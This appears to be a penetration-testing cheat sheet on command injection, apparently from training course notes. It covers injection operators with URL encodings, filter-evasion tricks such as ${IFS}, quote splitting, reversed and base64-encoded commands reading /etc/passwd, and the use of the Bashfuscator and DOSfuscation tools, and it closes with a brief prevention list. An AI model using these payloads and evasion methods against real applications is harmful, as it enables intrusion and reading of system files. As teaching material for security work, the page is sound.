Command Injection

Command Injection Methods

Injection Operator

Injection Character

URL-Encoded Character

Executed Command

Semicolon

;

%3b

Both

New Line

%0a

Both

Background

&

%26

Both (second output generally shown first)

Pipe

|

%7c

Both (only second output is shown)

AND

&&

%26%26

Both (only if first succeeds)

||

%7c%7c

Second (only if first fails)

Sub-Shell

%60%60

Both (Linux-only)

Sub-Shell

$()

%24%28%29

Both (Linux-only)

Other Injection Operators

Injection Type

Operators

SQL Injection

' , ; -- /* */

Command Injection

; &&

LDAP Injection

* ( ) & |

XPath Injection

' or and not substring concat count

OS Command Injection

; & |

Code Injection

' ; -- /* */ $() ${} #{} %{} ^

Directory Traversal/File Path Traversal

../ ..\\ %00

Object Injection

; & |

XQuery Injection

' ; -- /* */

Shellcode Injection

\x \u %u %n

Header Injection

\r %0d %0a %09

Bypass

Space

%09 (tab)
${IFS}
{ls,-la} Brace expansion
PayloadsAllTheThings Command Injection bypass-without-space

Other Blacklisted Characters

Linux

$ echo ${PATH:0:1}

/

$ echo ${LS_COLORS:10:1}

;

Windows

C:\htb> echo %HOMEPATH:~6,-11%

\

PS C:\htb> $env:HOMEPATH[0]

\

Character Shifting

$ man ascii     # \ is on 92, before it is [ on 91
$ echo $(tr '!-}' '"-~'<<<[)

\

Blacklisted Commands

Linux & Windows

$ w'h'o'am'i
$ w"h"o"am"i

Linux Only

$ who$@ami
$ w\ho\am\i

Windows Only

C:\htb> who^ami

Advance Command Obfuscation

Case Manipulation

PS C:\htb> WhOaMi

$ $(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$ $(a="WhOaMi";printf %s "${a,,}")

Reversed Commands

PS C:\htb> iex "$('imaohw'[-1..-20] -join '')"

$ $(rev<<<'imaohw')

Encoded Commands

PS C:\htb> iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

$ echo -n 'cat /etc/passwd | grep 33' | base64
$ bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

More Payloads

PayloadsAllTheThings

Evasion Tools

Linux (Bashfuscator)

Installation

$ git clone https://github.com/Bashfuscator/Bashfuscator
$ cd Bashfuscator
$ python3 setup.py install --user

Usage

$ cd ./bashfuscator/bin/
$ ./bashfuscator -h
$ ./bashfuscator -c 'cat /etc/passwd'
$ ./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1

Windows (DOSfuscation)

Installation

PS C:\htb> git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
PS C:\htb> cd Invoke-DOSfuscation
PS C:\htb> Import-Module .\Invoke-DOSfuscation.psd1

Usage

PS C:\htb> Invoke-DOSfuscation
Invoke-DOSfuscation> help
Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\Encoding> 1

Prevention

Avoid executing system commands
Input validation on both front-end and back-end
Input sanitization
Server configuration
- use WAF
- apply principle of least privilege (use www-data for example)
- open_basedir = '/var/www/html'
- Reject double-encoded requests and non-ASCII characters in URLs
- Avoid the use of sensitive/outdated libraries and modules

PreviousOther Upload Attacks NextHTTP Verb Tampering

Last updated 2 years ago